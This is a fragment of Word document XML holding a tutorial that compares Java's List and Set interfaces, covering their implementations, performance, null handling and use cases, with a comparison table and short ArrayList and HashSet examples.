        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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nkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A441D86" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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ector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D572F" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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ck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076A2CB" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72501997" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ome common implementations of the Set interface are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F29984" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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hSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8008B" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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nkedHashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339B90D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6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eeSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CF86C" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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B71FC45">
          <v:rect id="_x0000_i1406" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5312C2" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703A046" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61288AC0" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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provides fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is efficient for retrieving elements, but adding or removing elements in the middle of the list can be slow due to shifting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FC230" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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provides fast insertion and deletion but slower random access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A98E7E" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC56B6" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(1)) for add, remove, and contains operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C273CE9" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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reeSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintains elements in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sorted order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and provides logarithmic time performance (O(log n)) for operations like add() and remove().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858AAB6" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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EE7B3C3">
          <v:rect id="_x0000_i1407" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C99C987" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Null Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D52FD6" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798FEE2" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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List can contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements, and there can be multiple nulls in a list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376EB49" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D186D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Set can contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at most one null element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In a HashSet, for example, you can add </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and any attempts to add another null will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EDD52" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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9E831BC">
          <v:rect id="_x0000_i1408" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D76D2" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D41C92" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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st:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458F56B" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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 a List when you need to maintain the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of elements or when you need to access elements by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBBE53" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Maintaining a list of students where order is important, or if you need to access a specific student by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A512F53" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57914D55" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Use a Set when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eliminate duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or don't care about the order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5088F9" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Storing unique values such as a list of email addresses where duplicates should be avoided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3A328" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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BC8B05E">
          <v:rect id="_x0000_i1409" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7022E" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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Quick Comparis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48"/>
        <w:gridCol w:w="2728"/>
        <w:gridCol w:w="5128"/>
      </w:tblGrid>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="264FD719" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FDB97F2" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="00E80196">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4660F4DB" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="00E80196">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List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="109E5C83" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="00E80196">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et</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="5D761B0F" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FFB94D3"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uplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51894C13"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lows duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B38648C"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oes not allow duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="79B270AD" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16F9043D"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rder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A246050"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intains insertion order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108FDA32"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nordered (HashSet) or maintains insertion order (LinkedHashSet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="68E105CB" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9985BF"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15ACD59E"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ccess by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228BD116"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index-based access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="0A75FF64" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA81D8E"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mon Implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B829E24"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rayList, LinkedList, Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF97E7A"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hSet, TreeSet, LinkedHashSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="16B073C4" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD3568C"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ull Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25AC340B"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lows multiple nulls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A555526"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lows at most one null element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="76E35075" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A55DB55"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ACBF70A"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rayList - good for random access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD10617"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hSet - fast add/remove (O(1))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="099289E0" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0050129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D22F364">
          <v:rect id="_x0000_i1410" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0031B" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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de Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42440D82" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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List Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C700E1"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38798A9C"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C75877" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F99A63E"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ListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B90A3"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19387736"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26421CB9"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154B155"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923F8B3"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Apple"); // Duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408B74E"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list); // Output: [Apple, Banana, Apple]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D01BA"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9E826F7"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A2BCF3D" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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et Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA1427"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HashSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3F076"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Set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CC5F9" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E539289"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etExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27296AA3"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7AECB306"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lt;String&gt; set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CD5C7"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC22303"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5FD42"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Apple"); // Duplicate element will be ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91BEA5"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et); // Output: [Apple, Banana]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B8879"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2BF5D34" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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267662A" w14:textId="00A92630" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C71DAB" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129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28C9FCBE" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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st</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows duplicates, maintains order, and supports index-based access.</w:t>
      </w:r>
    </w:p>
